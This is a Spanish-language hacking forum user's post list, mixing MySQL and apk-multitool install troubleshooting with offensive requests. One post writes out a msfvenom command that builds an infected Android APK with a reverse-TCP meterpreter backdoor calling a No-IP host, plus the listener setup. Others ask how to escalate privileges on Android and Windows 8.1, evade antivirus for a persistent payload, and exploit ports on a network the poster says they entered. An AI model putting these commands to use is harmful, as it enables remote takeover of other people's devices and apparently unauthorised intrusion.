Dudas y pedidos generales / [SOLUCIONADO] Gambas3 y mysql me volca toda la informacion en una tabla
Mayo 23, 2016, 10:27:41 PM
buenas Noches por aca nuevamente XD
hoy traigo una pregunta con relacion a la programacioon en Gambas3 y Mysql bien
una vez que lleno el formulatrio de un usuario y lo guardo en la BD no me genera error pero cuando lo busco y quiero actualizar los datos me volca toda la informacion de la la tabla en un solo campo que es domicilio y cuando me voy al codigo esta bien no me explico porque pasa eso me pueden ayudar==??
hoy traigo una pregunta con relacion a la programacioon en Gambas3 y Mysql bien
una vez que lleno el formulatrio de un usuario y lo guardo en la BD no me genera error pero cuando lo busco y quiero actualizar los datos me volca toda la informacion de la la tabla en un solo campo que es domicilio y cuando me voy al codigo esta bien no me explico porque pasa eso me pueden ayudar==??
#15
Dudas y pedidos generales / ¿Cómo puedo ser root en un mini S3 desde meterpreter?
Mayo 22, 2016, 08:49:37 PM
Buenas noches, por aca nuevamente con una consulta..
¿Cómo puedo ser usuario root desde meterpreter o shell si el disositivo andoid no tiene root instalado?
Ya que requiero ungresar a carṕetas que no tengo acceso en el dispositivo..
Se puede escalar privvilegios?? Como me puedo chek con root les pregunto a quen en la red no consigo mucha informacion no pido que me enseñen solo un aporte para yo seguir investigando feliz noche.
¿Cómo puedo ser usuario root desde meterpreter o shell si el disositivo andoid no tiene root instalado?
Ya que requiero ungresar a carṕetas que no tengo acceso en el dispositivo..
Se puede escalar privvilegios?? Como me puedo chek con root les pregunto a quen en la red no consigo mucha informacion no pido que me enseñen solo un aporte para yo seguir investigando feliz noche.
#16
Dudas y pedidos generales / [SOLUCIONADO] Error en instalación de mysql
Mayo 21, 2016, 01:35:17 AM
buens noches compañeros tengo 7 horas tratando de iinstalar phpmyadmin mysql apache hago la instalacion correcta pero en my sql me genera el siguiente error
# mysql -uroot -p
Enter password:
ERROR 2002 (HY000): Can't connect to local MySQL server through socket '/var/run/mysqld/mysqld.sock' (2)
utilizando kali linux 64 bit ya no se que hacer eh probado casi todo ya son casi 8 horas de prueba y aun no termino la instalacion me pueden ayudar por favor =???
# mysql -uroot -p
Enter password:
ERROR 2002 (HY000): Can't connect to local MySQL server through socket '/var/run/mysqld/mysqld.sock' (2)
utilizando kali linux 64 bit ya no se que hacer eh probado casi todo ya son casi 8 horas de prueba y aun no termino la instalacion me pueden ayudar por favor =???
#17
Dudas y pedidos generales / [SOLUCIONADO] Cómo hacer un bypass a un ativirus en win 8.1?
Mayo 19, 2016, 07:56:27 PM
buenas Tardes
actualmente con entorno de red local realizando pruebas con meterpreter para alojar un payload persistente y escalar privilegios en win 8.1 con todas las actualizaciones y 1 antivirus de micr--- system center. como puedo escalar los privile.... en win 8.1 actualmente sigo investigando sy me ayudan con aportes mucho mejor o el nombre de un ataque para probar e investigar
actualmente con entorno de red local realizando pruebas con meterpreter para alojar un payload persistente y escalar privilegios en win 8.1 con todas las actualizaciones y 1 antivirus de micr--- system center. como puedo escalar los privile.... en win 8.1 actualmente sigo investigando sy me ayudan con aportes mucho mejor o el nombre de un ataque para probar e investigar
#18
Dudas y pedidos generales / [SOLUCIONADO] CÓmo puedo utilizar backdoor de androi fuera de mi red?
Mayo 16, 2016, 03:04:49 PM
Buenas Tardes compañeros tenfo el siguiente problema :
quiero usar payload de android fuera de mi red usando los siguientes aplicativos:
* mi proveedor de servicios es digitel recivido con un bam 4G LTE E3275
* msfconsole
* apk-multitool
* APP DE NO IP
realizo los siguientes pasos para la creacion de el apk infectado
msfvenom -p android/meterpreter/reverse_tcp LHOST= "HOST DE NO-IP" LPORT=1234 R > pp.apk
despues de crear la aplicacion lo procedo a firmar con apk-multitool con la opcion 4
una vez realizada la firma en la aplicacion procedo a poner a la escucha mi pp con los siguientes comandos
* set payload android/meterpreter/reverse_tcp
msf exploit(handler) > set payload android/meterpreter/reverse_tcp
payload => android/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST HOST DE NO IP
LHOST => No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
msf exploit(handler) > set LPORT 1234
LPORT => 1234
msf exploit(handler) > exploit
[-] Handler failed to bind to IP DE NO_IP:1234:- -
Started reverse TCP handler on 0.0.0.0:1234
Starting the payload handler...
instalo la app y se instala correcramente sin problema alguno se inicia en segundo plano pero no me muestra la informacion en el exploit realizado
Me podrian orientar con este caso? dentro de la red si me funciona correctamente pero fuera de ella no hace nada, Muchas Gracias
quiero usar payload de android fuera de mi red usando los siguientes aplicativos:
* mi proveedor de servicios es digitel recivido con un bam 4G LTE E3275
* msfconsole
* apk-multitool
* APP DE NO IP
realizo los siguientes pasos para la creacion de el apk infectado
msfvenom -p android/meterpreter/reverse_tcp LHOST= "HOST DE NO-IP" LPORT=1234 R > pp.apk
despues de crear la aplicacion lo procedo a firmar con apk-multitool con la opcion 4
una vez realizada la firma en la aplicacion procedo a poner a la escucha mi pp con los siguientes comandos
* set payload android/meterpreter/reverse_tcp
msf exploit(handler) > set payload android/meterpreter/reverse_tcp
payload => android/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST HOST DE NO IP
LHOST => No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
msf exploit(handler) > set LPORT 1234
LPORT => 1234
msf exploit(handler) > exploit
[-] Handler failed to bind to IP DE NO_IP:1234:- -
Started reverse TCP handler on 0.0.0.0:1234
Starting the payload handler...
instalo la app y se instala correcramente sin problema alguno se inicia en segundo plano pero no me muestra la informacion en el exploit realizado
Me podrian orientar con este caso? dentro de la red si me funciona correctamente pero fuera de ella no hace nada, Muchas Gracias
#19
Dudas y pedidos generales / [SOLUCIONADO] Cómo instalar apk-multitool
Mayo 14, 2016, 09:06:00 PM
Buenas Noches Compañeros el dia de hoy es estado instalando la app apk-multitool y no eh podido aun estos son los pasos a seguir segun el READMEN que trae el instalador aca los pasos :
Installing APK Multi-Tool Itself
Instructions (Linux):
- Create a folder in your sdk called "APK-Multi-Tool" and put the contents of the extracted APK-Multi-Tool into it or Rename the extracted APK-Multi-Tool folder to just APK-Multi-Tool and put it into the sdk folder.
- Go to the the "sdk/APK-Multi-Tool" folder and rename "Script.sh" to "script.sh".
- Go into the "other" folder, right click on one executable file at a time, select properties, go to "permissions" in the new window and check the "allow file to be run as a program" box (do this with all the executables/.exe's).
- Open a terminal in the APK-Multi-Tool folder (or type in terminal: cd "PATH TO THE No tienes permitido ver los links. Registrarse o Entrar a mi cuenta"). Type in:
chmod 755 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
- chmod 755 all files inside other folder. (thanks for the tip bkmo )
- Install "sox": Open the software center of the linux service and searched for sox. Once installed you will have SOX working
- To add the path to your folder open up a terminal and type in:
sudo su
PATH=$PATH:/THE PATH TO YOUR "SCRIPT.SH"
(for me this looks like the following)
PATH=$PATH:/home/username/sdk/APK-Multi-Tool
- Export PATH:Open up a terminal in the APK-Multi-Tool folder (or type in terminal: cd "PATH TO THE No tienes permitido ver los links. Registrarse o Entrar a mi cuenta") and type in:
export PATH={PATH}:/PATH TO Your SDK/sdk/platform-tools/adb
(for me this looks like the following)
export PATH={PATH}:/home/username/sdk/platform-tools
("username" is the user name that appears on your computer).
- Now open a terminal in the APK-Multi-Tool folder (or type in terminal: cd "PATH TO THE No tienes permitido ver los links. Registrarse o Entrar a mi cuenta") and type in:
./script.sh
Y esto es lo que yo hago:
1-- descomprimo el .tar en la carpeta SDK que cree con mkdir SDK
2 cd SDK/APK
3 -- chmod 755 *.sh
4 .. chmod 755 other/*.*
5 --- PATH=$PATH:SDK/APK/script.sh
6-- creo otra carpeta en la carpeta SDK mkdir SDk/PLATFORM-TOOls
-7-- export PATH={PATH}:sdk/platform-tools/adb
8 ./script.sh
el abre la aplicacion pero no hace nada y cuando cierro la terminal y vuelvo a ejecutar el No tienes permitido ver los links. Registrarse o Entrar a mi cuenta me aparece el siguiente msj:
oading defaults & preferences... Done.
Checking required binaries & files...
The program optipng is missing or is not in your PATH.
Please install it or fix your PATH variable
The program adb is missing or is not in your PATH.
Please install it or fix your PATH variable
The program aapt is missing or is not in your PATH.
Please install it or fix your PATH variable
Y no se que hacer alguien lo instalo sin problemas de antemano muchas gracias feliz noche....
Installing APK Multi-Tool Itself
Instructions (Linux):
- Create a folder in your sdk called "APK-Multi-Tool" and put the contents of the extracted APK-Multi-Tool into it or Rename the extracted APK-Multi-Tool folder to just APK-Multi-Tool and put it into the sdk folder.
- Go to the the "sdk/APK-Multi-Tool" folder and rename "Script.sh" to "script.sh".
- Go into the "other" folder, right click on one executable file at a time, select properties, go to "permissions" in the new window and check the "allow file to be run as a program" box (do this with all the executables/.exe's).
- Open a terminal in the APK-Multi-Tool folder (or type in terminal: cd "PATH TO THE No tienes permitido ver los links. Registrarse o Entrar a mi cuenta"). Type in:
chmod 755 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
- chmod 755 all files inside other folder. (thanks for the tip bkmo )
- Install "sox": Open the software center of the linux service and searched for sox. Once installed you will have SOX working
- To add the path to your folder open up a terminal and type in:
sudo su
PATH=$PATH:/THE PATH TO YOUR "SCRIPT.SH"
(for me this looks like the following)
PATH=$PATH:/home/username/sdk/APK-Multi-Tool
- Export PATH:Open up a terminal in the APK-Multi-Tool folder (or type in terminal: cd "PATH TO THE No tienes permitido ver los links. Registrarse o Entrar a mi cuenta") and type in:
export PATH={PATH}:/PATH TO Your SDK/sdk/platform-tools/adb
(for me this looks like the following)
export PATH={PATH}:/home/username/sdk/platform-tools
("username" is the user name that appears on your computer).
- Now open a terminal in the APK-Multi-Tool folder (or type in terminal: cd "PATH TO THE No tienes permitido ver los links. Registrarse o Entrar a mi cuenta") and type in:
./script.sh
Y esto es lo que yo hago:
1-- descomprimo el .tar en la carpeta SDK que cree con mkdir SDK
2 cd SDK/APK
3 -- chmod 755 *.sh
4 .. chmod 755 other/*.*
5 --- PATH=$PATH:SDK/APK/script.sh
6-- creo otra carpeta en la carpeta SDK mkdir SDk/PLATFORM-TOOls
-7-- export PATH={PATH}:sdk/platform-tools/adb
8 ./script.sh
el abre la aplicacion pero no hace nada y cuando cierro la terminal y vuelvo a ejecutar el No tienes permitido ver los links. Registrarse o Entrar a mi cuenta me aparece el siguiente msj:
oading defaults & preferences... Done.
Checking required binaries & files...
The program optipng is missing or is not in your PATH.
Please install it or fix your PATH variable
The program adb is missing or is not in your PATH.
Please install it or fix your PATH variable
The program aapt is missing or is not in your PATH.
Please install it or fix your PATH variable
Y no se que hacer alguien lo instalo sin problemas de antemano muchas gracias feliz noche....
#20
Dudas y pedidos generales / [SOLUCIONADO] Ayuda con escaneo de puertos no se que hacer.
Mayo 13, 2016, 10:34:34 AM
Buen Dia.
actualmente me encuentro en proceso de aprendizaje en estes mundo, y me llama mucho la atencion, compañeros, tengo una duda ya logre entrar a un espacio en la red pero cuando escaneo con nmap 2 ip me arroja es siguiente repote:
Starting Nmap 7.12 ( No tienes permitido ver los links. Registrarse o Entrar a mi cuenta ) at 2016-05-13 08:42 VET
Nmap scan report for (192.168.59.000)
Host is up (0.00093s latency).
Not shown: 993 filtered ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows 98 netbios-ssn
445/tcp open microsoft-ds Microsoft Windows 10 microsoft-ds
2021/tcp open servexec?
3389/tcp open ssl/ms-wbt-server?
49152/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
MAC Address: 900-00-00-00-00-00-00-00 (Dell)
Service Info: OSs: Windows, Windows 98, Windows 10; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_98, cpe:/o:microsoft:windows_10
Nmap scan report for (192.168.59.000)
Host is up (0.0029s latency).
Not shown: 992 filtered ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows 98 netbios-ssn
445/tcp open microsoft-ds Microsoft Windows 10 microsoft-ds
1027/tcp open msrpc Microsoft Windows RPC
1028/tcp open msrpc Microsoft Windows RPC
2021/tcp open servexec?
2701/tcp open cmrcservice Microsoft Configuration Manager Remote Control service (CmRcService.exe)
2869/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
MAC Address: 00-00-00-00-00-00(Dell)
Service Info: OSs: Windows, Windows 98, Windows 10; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_98, cpe:/o:microsoft:windows_10
Service detection performed. Please report any incorrect results at No tienes permitido ver los links. Registrarse o Entrar a mi cuenta .
Nmap done: 2 IP addresses (2 hosts up) scanned in 80.10 seconds
en el puerto 2021 esta a la escucha para conexiones radmin yo me quisiera conectar por la shell pero no se como cuando realizo un telnet me arroja la siguiente informacion:
Trying 192.168.59.252...
Connected to 192.168.59.252.
Escape character is '^]'.
CUALQUIER COMANDO NO HACE NADA
Connection closed by foreign host.
la pregunta del millon que puedo hacer con los puertos mostrados estoy investigando, necesito de su apoyo para seguir avanzando.
de antemano muchas gracia.
actualmente me encuentro en proceso de aprendizaje en estes mundo, y me llama mucho la atencion, compañeros, tengo una duda ya logre entrar a un espacio en la red pero cuando escaneo con nmap 2 ip me arroja es siguiente repote:
Starting Nmap 7.12 ( No tienes permitido ver los links. Registrarse o Entrar a mi cuenta ) at 2016-05-13 08:42 VET
Nmap scan report for (192.168.59.000)
Host is up (0.00093s latency).
Not shown: 993 filtered ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows 98 netbios-ssn
445/tcp open microsoft-ds Microsoft Windows 10 microsoft-ds
2021/tcp open servexec?
3389/tcp open ssl/ms-wbt-server?
49152/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
MAC Address: 900-00-00-00-00-00-00-00 (Dell)
Service Info: OSs: Windows, Windows 98, Windows 10; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_98, cpe:/o:microsoft:windows_10
Nmap scan report for (192.168.59.000)
Host is up (0.0029s latency).
Not shown: 992 filtered ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows 98 netbios-ssn
445/tcp open microsoft-ds Microsoft Windows 10 microsoft-ds
1027/tcp open msrpc Microsoft Windows RPC
1028/tcp open msrpc Microsoft Windows RPC
2021/tcp open servexec?
2701/tcp open cmrcservice Microsoft Configuration Manager Remote Control service (CmRcService.exe)
2869/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
MAC Address: 00-00-00-00-00-00(Dell)
Service Info: OSs: Windows, Windows 98, Windows 10; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_98, cpe:/o:microsoft:windows_10
Service detection performed. Please report any incorrect results at No tienes permitido ver los links. Registrarse o Entrar a mi cuenta .
Nmap done: 2 IP addresses (2 hosts up) scanned in 80.10 seconds
en el puerto 2021 esta a la escucha para conexiones radmin yo me quisiera conectar por la shell pero no se como cuando realizo un telnet me arroja la siguiente informacion:
Trying 192.168.59.252...
Connected to 192.168.59.252.
Escape character is '^]'.
CUALQUIER COMANDO NO HACE NADA
Connection closed by foreign host.
la pregunta del millon que puedo hacer con los puertos mostrados estoy investigando, necesito de su apoyo para seguir avanzando.
de antemano muchas gracia.
Páginas1
